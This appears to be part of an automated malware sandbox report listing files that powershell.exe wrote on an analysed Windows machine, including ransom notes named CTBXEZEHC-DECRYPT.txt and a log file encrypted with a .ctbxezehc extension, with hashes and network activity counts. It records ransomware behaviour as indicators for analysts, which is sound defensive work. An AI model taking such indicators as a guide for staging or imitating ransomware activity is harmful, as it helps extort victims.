powershell.exe
C:\Users\admin\AppData\Roaming\Adobe\LogTransport2\LogTransport2.cfg
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Adobe\LogTransport2\Logs\ulog_HeadlightsOptinProductFamily_HeadlightsOptinProduct_00000000-0000-0000-0000-000000000000_dc2ece58-8a8b-40bf-98c2-48039a3392bd.log
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Adobe\LogTransport2\Logs\ulog_AcroARM2_Reader_2274f67c-7a7f-45e3-a23e-aa35d5b91e00_02f147fa-0489-4885-b993-ed9936fcacc0_0.rdy
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Adobe\LogTransport2\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Adobe\Flash Player\NativeCache\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Adobe\LogTransport2\Logs\ulog_AcroARM2_ARM2Update_2274f67c-7a7f-45e3-a23e-aa35d5b91e00_fea03e67-af51-4fcb-b57f-c238867edb9b_0.log.ctbxezehc
binary
MD5: f8562b164ba4c63e80695fc7feecd4ac
SHA256: 9ef653093dc5d4a14f815e7d1d036b765662ed3eed4a76998a5fb822d6af3df4
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Adobe\LogTransport2\Logs\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Adobe\Headlights\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Adobe\Linguistics\CTBXEZEHC-DECRYPT.txt
text
MD5: afb0a586264eeb8e4a3554bfa6df3649
SHA256: 559098c7eb660e8af2d20030cbc1be7e4ccc86c142e0f688a6079688f8da0af6
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Adobe\LogTransport2\Logs\ulog_AcroARM2_ARM2Update_2274f67c-7a7f-45e3-a23e-aa35d5b91e00_fea03e67-af51-4fcb-b57f-c238867edb9b_0.log
––
MD5:  ––
SHA256:  ––
3596
powershell.exe
C:\Users\admin\AppData\Roaming\Adobe\Flash Player\AssetCache\J7D4H966\CTBXEZEHC-DECRYPT.txt
text

Find more information about the static content and download it at the full report

Network activity

HTTP(S) requests
138
TCP/UDP connections
265
DNS requests
111
Threats
74

HTTP requests


Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections


DNS requests
